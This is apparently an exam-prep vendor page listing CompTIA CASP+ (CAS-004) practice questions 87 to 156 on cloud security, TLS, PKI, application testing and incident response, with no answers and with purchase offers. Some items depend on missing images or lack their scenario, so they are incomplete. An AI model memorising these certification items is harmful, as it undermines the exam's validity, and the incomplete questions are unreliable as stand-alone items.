CAS-004 Question 87

Which of the following should the company do next to mitigate the risk of a compromise from these attacks?

Options:

A.

Restrict HTTP methods.

B.

Perform parameterized queries.

C.

Implement input sanitization.

D.

Validate content types.

Buy Now
Questions 88

A software developer needs to add an authentication method to a web application. The following requirements must be met:

• The web application needs to use well-supported standards.

• The initial login to the web application should rely on an outside, trusted third party.

• The login needs to be maintained for up to six months.

Which of the following would best support these requirements? (Select two).

Options:

A.

SAML

B.

Kerberos

C.

JWT

D.

RADIUS

E.

EAP

F.

Remote attestation

Buy Now
Questions 89

An organization needs to classify its systems and data in accordance with external requirements. Which of the following roles is best qualified to perform this task?

Options:

A.

Systems administrator

B.

Data owner

C.

Data processor

D.

Data custodian

E.

Data steward

Buy Now
Questions 90

A security engineer is working for a service provider and analyzing logs and reports from a new EDR solution, which is installed on a small group of workstations. Later that day, another security engineer receives an email from two developers reporting the software being used for development activities is now blocked. The developers have not made any changes to the software being used. Which of the following is the EDR reporting?

Options:

A.

True positive

B.

False negative

C.

False positive

D.

True negative

Buy Now
Questions 91

The security analyst discovers a new device on the company’s dedicated loT subnet during the most recent vulnerability scan. The scan results show numerous open ports and insecure protocols in addition to default usernames and passwords. A camera needs to transmit video to the security server in the loT subnet. Which of the following should the security analyst recommend to securely operate the camera?

Options:

A.

Harden the camera configuration.

B.

Send camera logs to the SIEM.

C.

Encrypt the camera's video stream.

D.

Place the camera on an isolated segment

Buy Now
Questions 92

A large organization is planning to migrate from on premises to the cloud. The Chief Information Security Officer (CISO) is concerned about security responsibilities. If the company decides to migrate to the cloud, which of the following describes who is responsible for the security of the new physical datacenter?

Options:

A.

Third-party assessor

B.

CSP

C.

Organization

D.

Shared responsibility

Buy Now
Questions 93

A junior security researcher has identified a buffer overflow vulnerability leading to remote code execution in a former employer's software. The security researcher asks for the manager's advice on the vulnerability submission process. Which of the following is the best advice the current manager can provide the security researcher?

Options:

A.

Collect proof that the exploit works in order to expedite the process.

B.

Publish proof-of-concept exploit code on a personal blog.

C.

Recommend legal consultation about the process.

D.

Visit a bug bounty website for the latest information.

Buy Now
Questions 94

A company moved its on-premises services to the cloud. Although a recent audit verified that data throughout the cloud service is properly classified and documented, other systems are unable to act or filter based on this information. Which of the following should the company deploy to allow other cloud-based systems to consume this information?

Options:

A.

Data mapping

B.

Data labeling

C.

Log scraping

D.

Resource tagging

Buy Now
Questions 95

A security analyst is reviewing the following output from a vulnerability scan from an organization's internet-facing web services:

CAS-004 Question 95

Which of the following indicates a susceptibility whereby an attacker can take advantage of the trust relationship between the client and the server?

Options:

A.

Line 06

B.

Line 10

C.

Line 13

D.

Line 17

Buy Now
Questions 96

The Chief Executive Officer of an online retailer notices a sudden drop in sales A security analyst at the retailer detects a redirection of unsecure web traffic to a competitor's site Which of the following would best prevent this type of attack?

Options:

A.

Enabling HSTS

B.

Configuring certificate pinning

C.

Enforcing DNSSEC

D.

Deploying certificate stapling

Buy Now
Questions 97

During a review of events, a security analyst notes that several log entries from the FIM system identify changes to firewall rule sets. While coordinating a response to the FIM entries, the analyst receives alerts from the DLP system that indicate an employee is sending sensitive data to an external email address. Which of the following would be the most relevant to review in order to gain a better understanding of whether these events are associated with an attack?

Options:

A.

Configuration management tool

B.

Intrusion prevention system

C.

Mobile device management platform

D.

Firewall access control list

E.

NetFlow logs

Buy Now
Questions 98

A forensics investigator is analyzing an executable file extracted from storage media that was submitted (or evidence The investigator must use a tool that can identify whether the executable has indicators, which may point to the creator of the file Which of the following should the investigator use while preserving evidence integrity?

Options:

A.

idd

B.

bcrypt

C.

SHA-3

D.

ssdeep

E.

dcfldd

Buy Now
Questions 99

A company's software developers have indicated that the security team takes too long to perform application security tasks. A security analyst plans to improve the situation by implementing security into the SDLC. The developers have the following requirements:

1. The solution must be able to initiate SQL injection and reflected XSS attacks.

2. The solution must ensure the application is not susceptible to memory leaks.

Which of the following should be implemented to meet these requirements? (Select two).

Options:

A.

Side-channel analysis

B.

Protocol scanner

C.

HTTP interceptor

D.

DAST

E.

Fuzz testing

F.

SAST

G.

SCAP

Buy Now
Questions 100

Application owners are reporting performance issues with traffic using port 1433 from the cloud environment. A security administrator has various pcap files to analyze the data between the related source and destination servers. Which of the following tools should be used to help troubleshoot the issue?

Options:

A.

Fuzz testing

B.

Wireless vulnerability scan

C.

Exploit framework

D.

Password cracker

E.

Protocol analyzer

Buy Now
Questions 101

A company's BIA indicates that any loss of more than one hour of data would be catastrophic to the business. Which of the following must be in place to meet this requirement?

Options:

A.

RPO

B.

RTO

C.

SLA

D.

DRP

E.

BCP

Buy Now
Questions 102

A small bank is evaluating different methods to address and resolve the following requirements

" Must be able to store credit card data using the smallest amount of data possible

• Must be compliant with PCI DSS

• Must maintain confidentiality if one piece of the layer is compromised

Which of the following is the best solution for the bank?

Options:

A.

Scrubbing

B.

Tokenization

C.

Masking

D.

Homomorphic encryption

Buy Now
Questions 103

A security team is creating tickets to track the progress of remediation. Which of the following is used to specify the due dates for high- and critical-priority findings?

Options:

A.

MSA

B.

SLA

C.

ISA

D.

MOU

Buy Now
Questions 104

A company uses a CSP to provide a front end for its new payment system offering. The new offering is currently certified as PCI compliant. In order for the integrated solution to be

compliant, the customer:

Options:

A.

must also be PCI compliant, because the risk is transferred to the provider.

B.

still needs to perform its own PCI assessment of the provider's managed serverless service.

C.

needs to perform a penetration test of the cloud provider's environment.

D.

must ensure in-scope systems for the new offering are also PCI compliant.

Buy Now
Questions 105

A penetration tester inputs the following command:

CAS-004 Question 105

This command will allow the penetration tester to establish a:

Options:

A.

port mirror

B.

network pivot

C.

reverse shell

D.

proxy chain

Buy Now
Questions 106

A security analyst is assessing a new application written in Java. The security analyst must determine which vulnerabilities exist during runtime. Which of the following would provide the most exhaustive list of vulnerabilities while meeting the objective?

Options:

A.

Input validation

B.

Dynamic analysis

C.

Side-channel analysis

D.

Fuzz testing

E.

Static analysis

Buy Now
Questions 107

A security architect discovers the following page while testing a website for vulnerabilities:

404 - page not found: /gy67162

The page you have requested is no. avai.able on .his server.

Apache Tomcat 7.0.52

Which of the following best describes why this issue should be corrected?

Options:

A.

The website is generating a server error.

B.

The URL for this page can be used for directory traversal.

C.

The website fuzzing tool has overloaded the server's capacity.

D.

The information can be used for more targeted attacks.

Buy Now
Questions 108

A managed security provider (MSP) is engaging with a customer who was working through a complete digital transformation Part of this transformation involves a move to cloud servers to ensure a scalable, high-performance, online user experience The current architecture includes:

• Directory servers

• Web servers

• Database servers

• Load balancers

• Cloud-native VPN concentrator

• Remote access server

The MSP must secure this environment similarly to the infrastructure on premises Which of the following should the MSP put in place to BEST meet this objective? (Select THREE)

Options:

A.

Content delivery network

B.

Virtual next-generation firewall

C.

Web application firewall

D.

Software-defined WAN

E.

External vulnerability scans

F.

Containers

G.

Microsegmentation

Buy Now
Questions 109

A security review of the architecture for an application migration was recently completed. The following observations were made:

• External inbound access is blocked.

• A large amount of storage is available.

• Memory and CPU usage are low.

• The load balancer has only a single server assigned.

• Multiple APIs are integrated.

Which of the following needs to be addressed?

Options:

A.

Scalability

B.

Automation

C.

Availability

D.

Performance

Buy Now
Questions 110

A software developer created an application for a large, multinational company. The company is concerned the program code could be reverse engineered by a foreign entity and intellectual property would be lost. Which of the following techniques should be used to prevent this situation?

Options:

A.

Obfuscation

B.

Code signing

C.

Watermarking

D.

Digital certificates

Buy Now
Questions 111

A Chief Information Security Officer is concerned about the condition of the code security being used for web applications. It is important to get the review right the first time, and the company is willing to use a tool that will allow developers to validate code as it is written. Which of the following methods should the company use?

Options:

A.

SAST

B.

DAST

C.

Fuzz testing

D.

Intercepting proxy

Buy Now
Questions 112

A new requirement for legislators has forced a government security team to develop a validation process to verify the integrity of a downloaded file and the sender of the file Which of the following is the BEST way for the security team to comply with this requirement?

Options:

A.

Digital signature

B.

Message hash

C.

Message digest

D.

Message authentication code

Buy Now
Questions 113

A penetration tester discovers a condition that causes unexpected behavior in a web application. This results in the dump of the interpreter's debugging information, which includes the interpreter's version, full path of binary files, and the user ID running the process. Which of the following actions would best mitigate this risk?

Options:

A.

Include routines in the application for message handling

B.

Adopt a compiled programming language instead.

C.

Perform SAST vulnerability scans on every build.

D.

Validate user-generated input.

Buy Now
Questions 114

Which of the following describes how a risk assessment is performed when an organization has a critical vendor that provides multiple products?

Options:

A.

At the individual product level

B.

Through the selection of a random product

C.

Using a third-party audit report

D.

By choosing a major product

Buy Now
Questions 115

In order to save money, a company has moved its data to the cloud with a low-cost provider. The company did not perform a security review prior to the move; however, the company requires all of its data to be stored within the country where the headquarters is located. A new employee on the security team has been asked to evaluate the current provider against the most important requirements. The current cloud provider that the company is using offers:

• Only multitenant cloud hosting

• Minimal physical security

• Few access controls

• No access to the data center

The following information has been uncovered:

• The company is located in a known floodplain, which flooded last year.

• Government regulations require data to be stored within the country.

Which of the following should be addressed first?

Options:

A.

Update the disaster recovery plan to account for natural disasters.

B.

Establish a new memorandum of understanding with the cloud provider.

C.

Establish a new service-level agreement with the cloud provider.

D.

Provision services according to the appropriate legal requirements.

Buy Now
Questions 116

Two companies that recently merged would like to unify application access between the companies, without initially merging internal authentication stores. Which of the following technical strategies would best meet this objective?

Options:

A.

Federation

B.

RADIUS

C.

TACACS+

D.

MFA

E.

ABAC

Buy Now
Questions 117

A university issues badges through a homegrown identity management system to all staff and students. Each week during the summer, temporary summer school students arrive and need to be issued a badge to access minimal campus resources. The security team received a report from an outside auditor indicating the homegrown system is not consistent with best practices in the security field.

Which of the following should the security team recommend FIRST?

Options:

A.

Investigating a potential threat identified in logs related to the identity management system

B.

Updating the identity management system to use discretionary access control

C.

Beginning research on two-factor authentication to later introduce into the identity management system

D.

Working with procurement and creating a requirements document to select a new IAM system/vendor

Buy Now
Questions 118

An architectural firm is working with its security team to ensure that any draft images that are leaked to the public can be traced back to a specific external party. Which of the following would BEST accomplish this goal?

Options:

A.

Properly configure a secure file transfer system to ensure file integrity.

B.

Have the external parties sign non-disclosure agreements before sending any images.

C.

Only share images with external parties that have worked with the firm previously.

D.

Utilize watermarks in the images that are specific to each external party.

Buy Now
Questions 119

A network administrator for a completely air-gapped and closed system has noticed that anomalous external files have been uploaded to one of the critical servers. The administrator has reviewed logs

in the SIEM that were collected from security appliances, network infrastructure devices, and endpoints. Which of the following processes, if executed, would be MOST likely to expose an attacker?

Options:

A.

Reviewing video from IP cameras within the facility

B.

Reconfiguring the SIEM connectors to collect data from the perimeter network hosts

C.

Implementing integrity checks on endpoint computing devices

D.

Looking for privileged credential reuse on the network

Buy Now
Questions 120

An IPSec solution is being deployed. The configuration files for both the VPN

concentrator and the AAA server are shown in the diagram.

Complete the configuration files to meet the following requirements:

• The EAP method must use mutual certificate-based authentication (With

issued client certificates).

• The IKEv2 Cipher suite must be configured to the MOST secure

authenticated mode of operation,

• The secret must contain at least one uppercase character, one lowercase

character, one numeric character, and one special character, and it must

meet a minimum length requirement of eight characters,

INSTRUCTIONS

Click on the AAA server and VPN concentrator to complete the configuration.

Fill in the appropriate fields and make selections from the drop-down menus.

CAS-004 Question 120

VPN Concentrator:

CAS-004 Question 120

AAA Server:

CAS-004 Question 120

Options:

Buy Now
Questions 121

A company created an external, PHP-based web application for its customers. A security researcher reports that the application has the Heartbleed vulnerability. Which of the following would BEST resolve and mitigate the issue? (Select TWO).

Options:

A.

Deploying a WAF signature

B.

Fixing the PHP code

C.

Changing the web server from HTTPS to HTTP

D.

UsingSSLv3

E.

Changing the code from PHP to ColdFusion

F.

Updating the OpenSSL library

Buy Now
Questions 122

During a recent security incident investigation, a security analyst mistakenly turned off the infected machine prior to consulting with a forensic analyst. upon rebooting the machine, a malicious script that

was running as a background process was no longer present. As a result, potentially useful evidence was lost. Which of the following should the security analyst have followed?

Options:

A.

Order of volatility

B.

Chain of custody

C.

Verification

D.

Secure storage

Buy Now
Questions 123

An engineering team has deployed a new VPN service that requires client certificates to be used in order to successfully connect. On iOS devices, however, the following error occurs after importing the .p12 certificate file:

mbedTLS: ca certificate undefined

Which of the following is the root cause of this issue?

Options:

A.

iOS devices have an empty root certificate chain by default.

B.

OpenSSL is not configured to support PKCS#12 certificate files.

C.

The VPN client configuration is missing the CA private key.

D.

The iOS keychain imported only the client public and private keys.

Buy Now
Questions 124

A security analyst for a managed service provider wants to implement the most up-to-date and effective security methodologies to provide clients with the best offerings. Which of the following resources

would the analyst MOST likely adopt?

Options:

A.

OSINT

B.

ISO

C.

MITRE ATT&CK

D.

OWASP

Buy Now
Questions 125

Which of the following objectives BEST supports leveraging tabletop exercises in business continuity planning?

Options:

A.

Determine the optimal placement of hot/warm sites within the enterprise architecture.

B.

Create new processes for identified gaps in continuity planning.

C.

Establish new staff roles and responsibilities for continuity of operations.

D.

Assess the effectiveness of documented processes against a realistic scenario.

Buy Now
Questions 126

An analyst has prepared several possible solutions to a successful attack on the company. The solutions need to be implemented with the LEAST amount of downtime. Which of the following should the analyst perform?

Options:

A.

Implement all the solutions at once in a virtual lab and then run the attack simulation. Collect the metrics and then choose the best solution based on the metrics.

B.

Implement every solution one at a time in a virtual lab, running a metric collection each time. After the collection, run the attack simulation, roll back each solution, and then implement the next. Choose the best solution based on the best metrics.

C.

Implement every solution one at a time in a virtual lab, running an attack simulation each time while collecting metrics. Roll back each solution and then implement the next. Choose the best solution based on the best metrics.

D.

Implement all the solutions at once in a virtual lab and then collect the metrics. After collection, run the attack simulation. Choose the best solution based on the best metrics.

Buy Now
Questions 127

A mobile administrator is reviewing the following mobile device DHCP logs to ensure the proper mobile settings are applied to managed devices:

CAS-004 Question 127

Which of the following mobile configuration settings is the mobile administrator verifying?

Options:

A.

Service set identifier authentication

B.

Wireless network auto joining

C.

802.1X with mutual authentication

D.

Association MAC address randomization

Buy Now
Questions 128

Some end users of an e-commerce website are reporting a delay when browsing pages. The website uses TLS 1.2. A security architect for the website troubleshoots by connecting from home to the

website and capturing tramc via Wire-shark. The security architect finds that the issue is the time required to validate the certificate. Which of the following solutions should the security architect

recommend?

Options:

A.

Adding more nodes to the web server clusters

B.

Changing the cipher algorithm used on the web server

C.

Implementing OCSP stapling on the server

D.

Upgrading to TLS 1.3

Buy Now
Questions 129

In order to authenticate employees who, call in remotely, a company's help desk staff must be able to view partial Information about employees because the full information may be considered sensitive. Which of the following solutions should be implemented to authenticate employees?

Options:

A.

Data scrubbing

B.

Field masking

C.

Encryption in transit

D.

Metadata

Buy Now
Questions 130

In comparison with traditional on-premises infrastructure configurations, defining ACLs in a CSP relies on:

Options:

A.

cloud-native applications.

B.

containerization.

C.

serverless configurations.

D.

software-defined netWorking.

E.

secure access service edge.

Buy Now
Questions 131

Which of the following processes involves searching and collecting evidence during an investigation or lawsuit?

Options:

A.

E-discovery

B.

Review analysis

C.

Information governance

D.

Chain of custody

Buy Now
Questions 132

A security manager wants to transition the organization to a zero trust architecture. To meet this requirement, the security manager has instructed administrators to remove trusted zones, role-based access, and one-time authentication. Which of the following will need to be implemented to achieve this objective? (Select THREE).

Options:

A.

Least privilege

B.

VPN

C.

Policy automation

D.

PKI

E.

Firewall

F.

Continuous validation

G.

Continuous integration

Buy Now
Questions 133

The Chief Information Security Officer (CISO) asked a security manager to set up a system that sends an alert whenever a mobile device enters a sensitive area of the company's data center. The CISO would also like to be able to alert the individual who is entering the area that the access was logged and monitored. Which of the following would meet these requirements?

Options:

A.

Near-field communication

B.

Short Message Service

C.

Geofencing

D.

Bluetooth

Buy Now
Questions 134

A third-party organization has implemented a system that allows it to analyze customers' data and deliver analysis results without being able to see the raw data. Which of the following is the organization implementing?

Options:

A.

Asynchronous keys

B.

Homomorphic encryption

C.

Data lake

D.

Machine learning

Buy Now
Questions 135

A local university that has a global footprint is undertaking a complete overhaul of its website and associated systems. Some of the requirements are:

• Handle an increase in customer demand of resources

• Provide quick and easy access to information

• Provide high-quality streaming media

• Create a user-friendly interface

Which of the following actions should be taken FIRST?

Options:

A.

Deploy high-availability web servers.

B.

Enhance network access controls.

C.

Implement a content delivery network.

D.

Migrate to a virtualized environment.

Buy Now
Questions 136

The CI/CD pipeline requires code to have close to zero defects and zero vulnerabilities. The current process for any code releases into production uses two-week Agile sprints. Which of the following would BEST meet the requirement?

Options:

A.

An open-source automation server

B.

A static code analyzer

C.

Trusted open-source libraries

D.

A single code repository for all developers

Buy Now
Questions 137

Which of the following should be established when configuring a mobile device to protect user internet privacy, to ensure the connection is encrypted, and to keep user activity hidden? (Select TWO).

Options:

A.

proxy

B.

Tunneling

C.

VDI

D.

MDM

E.

RDP

F.

MAC address randomization

Buy Now
Questions 138

An investigator is attempting to determine if recent data breaches may be due to issues with a company's web server that offers news subscription services. The investigator has gathered the following

data:

• Clients successfully establish TLS connections to web services provided by the server.

• After establishing the connections, most client connections are renegotiated

• The renegotiated sessions use cipher suite SHR.

Which of the following is the MOST likely root cause?

Options:

A.

The clients disallow the use of modern cipher suites

B.

The web server is misconfigured to support HTTP/1.1.

C.

A ransomware payload dropper has been installed

D.

An entity is performing downgrade attacks on path

Buy Now
Questions 139

In a cloud environment, the provider offers relief to an organization's teams by sharing in many of the operational duties. In a shared responsibility model, which of the following responsibilities belongs to the provider in a Paas implementation?

Options:

A.

Application-specific data assets

B.

Application user access management

C.

Application-specific logic and code

D.

Application/platform software

Buy Now
Questions 140

A security engineer is implementing a server-side TLS configuration that provides forward secrecy and authenticated encryption with associated data. Which of the following algorithms, when combined into a cipher suite, will meet these requirements? (Choose three.)

Options:

A.

EDE

B.

CBC

C.

GCM

D.

AES

E.

RSA

F.

RC4

G.

ECDSA

Buy Now
Questions 141

An organization established an agreement with a partner company for specialized help desk services. A senior security officer within the organization Is tasked with providing documentation required to set up a dedicated VPN between the two entities. Which of the following should be required?

Options:

A.

SLA

B.

ISA

C.

NDA

D.

MOU

Buy Now
Questions 142

A company is deploying multiple VPNs to support supplier connections into its extranet applications. The network security standard requires:

• All remote devices to have up-to-date antivirus

• An up-to-date and patched OS

Which of the following technologies should the company deploy to meet its security objectives? (Select TWO)_

Options:

A.

NAC

B.

WAF

C.

NIDS

D.

Reverse proxy

E.

NGFW

F.

Bastion host

Buy Now
Questions 143

In a shared responsibility model for PaaS, which of the following is a customer's responsibility?

Options:

A.

Network security

B.

Physical security

C.

OS security

D.

Host infrastructure

Buy Now
Questions 144

The Chief Information Security Officer is concerned about the possibility of employees downloading ‘malicious files from the internet and ‘opening them on corporate workstations. Which of the following solutions would be BEST to reduce this risk?

Options:

A.

Integrate the web proxy with threat intelligence feeds.

B.

Scan all downloads using an antivirus engine on the web proxy.

C.

Block known malware sites on the web proxy.

D.

Execute the files in the sandbox on the web proxy.

Buy Now
Questions 145

A new, online file hosting service is being offered. The service has the following security requirements:

• Threats to customer data integrity and availability should be remediated first.

• The environment should be dynamic to match increasing customer demands.

• The solution should not interfere with customers" ability to access their data at anytime.

• Security analysts should focus on high-risk items.

Which of the following would BEST satisfy the requirements?

Options:

A.

Expanding the use of IPS and NGFW devices throughout the environment

B.

Increasing the number of analysts to Identify risks that need remediation

C.

Implementing a SOAR solution to address known threats

D.

Integrating enterprise threat feeds in the existing SIEM

Buy Now
Questions 146

An organization is looking to establish more robust security measures by implementing PKI. Which of the following should the security analyst implement when considering mutual authentication?

Options:

A.

Perfect forward secrecy on both endpoints

B.

Shared secret for both endpoints

C.

Public keys on both endpoints

D.

A common public key on each endpoint

E.

A common private key on each endpoint

Buy Now
Questions 147

A global organization's Chief Information Security Officer (CISO) has been asked to analyze the risks involved in a plan to move the organization's current MPLS-based WAN network to use commodity Internet and SD-WAN hardware. The SD-WAN provider is currently highly regarded but Is a regional provider. Which of the following is MOST likely identified as a potential risk by the CISO?

Options:

A.

The SD-WAN provider would not be able to handle the organization's bandwidth requirements.

B.

The operating costs of the MPLS network are too high for the organization.

C.

The SD-WAN provider uses a third party for support.

D.

Internal IT staff will not be able to properly support remote offices after the migration.

Buy Now
Questions 148

A software development company is building a new mobile application for its social media platform. The company wants to gain its users' trust by reducing the risk of on-path attacks between the mobile

client and its servers and by implementing stronger digital trust. To support users' trust, the company has released the following internal guidelines:

• Mobile clients should verify the identity of all social media servers locally.

• Social media servers should improve TLS performance of their certificate status

• Social media servers should inform the client to only use HTTPS.

Given the above requirements, which of the following should the company implement? (Select TWO).

Options:

A.

Quick UDP internet connection

B.

OCSP stapling

C.

Private CA

D.

DNSSEC

E.

CRL

F.

HSTS

G.

Distributed object model

Buy Now
Questions 149

Company A acquired Company B. During an initial assessment, the companies discover they are using the same SSO system. To help users with the transition, Company A is requiring the following:

• Before the merger is complete, users from both companies should use a single set of usernames and passwords.

• Users in the same departments should have the same set of rights and privileges, but they should have different sets of rights and privileges if they have different IPs.

• Users from Company B should be able to access Company A's available resources.

Which of the following are the BEST solutions? (Select TWO).

Options:

A.

Installing new Group Policy Object policies

B.

Establishing one-way trust from Company B to Company A

C.

Enabling multifactor authentication

D.

Implementing attribute-based access control

E.

Installing Company A's Kerberos systems in Company B's network

F.

Updating login scripts

Buy Now
Questions 150

A hospitality company experienced a data breach that included customer Pll. The hacker used social engineering to convince an employee to grant a third-party application access to some company documents within a cloud file storage service. Which of the following is the BEST solution to help prevent this type of attack in the future?

Options:

A.

NGFW for web traffic inspection and activity monitoring

B.

CSPM for application configuration control

C.

Targeted employee training and awareness exercises

D.

CASB for OAuth application permission control

Buy Now
Questions 151

A security consultant has been asked to identify a simple, secure solution for a small business with a single access point. The solution should have a single SSID and no guest access. The customer

facility is located in a crowded area of town, so there is a high likelihood that several people will come into range every day. The customer has asked that the solution require low administrative overhead

and be resistant to offline password attacks. Which of the following should the security consultant recommend?

Options:

A.

WPA2-Preshared Key

B.

WPA3-Enterprise

C.

WPA3-Personal

D.

WPA2-Enterprise

Buy Now
Questions 152

A security architect is tasked with securing a new cloud-based videoconferencing and collaboration platform to support a new distributed workforce. The security architect's key objectives are to:

• Maintain customer trust

• Minimize data leakage

• Ensure non-repudiation

Which of the following would be the BEST set of recommendations from the security architect?

Options:

A.

Enable the user authentication requirement, enable end-to-end encryption, and enable waiting rooms.

B.

Disable file exchange, enable watermarking, and enable the user authentication requirement.

C.

Enable end-to-end encryption, disable video recording, and disable file exchange.

D.

Enable watermarking, enable the user authentication requirement, and disable video recording.

Buy Now
Questions 153

A cloud security architect has been tasked with finding a solution for hardening VMS. The solution must meet the following requirements:

• Data needs to be stored outside of the VMS.

• No unauthorized modifications to the VMS are allowed

• If a change needs to be done, a new VM needs to be deployed.

Which of the following is the BEST solution?

Options:

A.

Immutable system

B.

Data loss prevention

C.

Storage area network

D.

Baseline template

Buy Now
Questions 154

A cloud security engineer is setting up a cloud-hosted WAF. The engineer needs to implement a solution to protect the multiple websites the organization hosts. The organization websites are:

* www.mycompany.org

* www.mycompany.com

* campus.mycompany.com

* wiki. mycompany.org

The solution must save costs and be able to protect all websites. Users should be able to notify the cloud security engineer of any on-path attacks. Which of the following is the BEST solution?

Options:

A.

Purchase one SAN certificate.

B.

Implement self-signed certificates.

C.

Purchase one certificate for each website.

D.

Purchase one wildcard certificate.

Buy Now
Questions 155

A security consultant has been asked to recommend a secure network design that would:

• Permit an existing OPC server to communicate with a new Modbus server that is controlling electrical relays.

• Limit operational disruptions.

Due to the limitations within the Modbus protocol, which of the following configurations should the security engineer recommend as part of the solution?

Options:

A.

Restrict inbound traffic so that only the OPC server is permitted to reach the Modbus server on port 135.

B.

Restrict outbound traffic so that only the OPC server is permitted to reach the Modbus server on port 102.

C.

Restrict outbound traffic so that only the OPC server is permitted to reach the Modbus server on port 5000.

D.

Restrict inbound traffic so that only the OPC server is permitted to reach the Modbus server on port 502.

Buy Now
Questions 156

A company is migrating from company-owned phones to a BYOD strategy for mobile devices. The pilot program will start with the executive management team and be rolled out to the rest of the staff in phases. The company’s Chief Financial Officer loses a phone multiple times a year.

Which of the following will MOST likely secure the data on the lost device?

Options:

A.

Require a VPN to be active to access company data.

B.

Set up different profiles based on the person’s risk.

C.

Remotely wipe the device.

D.

Require MFA to access company applications.

Buy Now
Exam Code: CAS-004
Exam Name: CompTIA Advanced Security Practitioner (CASP+) Exam
Last Update: Dec 4, 2024
Questions: 552

PDF + Testing Engine

$66  $164.99

Testing Engine

$50  $124.99
buy now CAS-004 testing engine

PDF (Q&A)

$42  $104.99
buy now CAS-004 pdf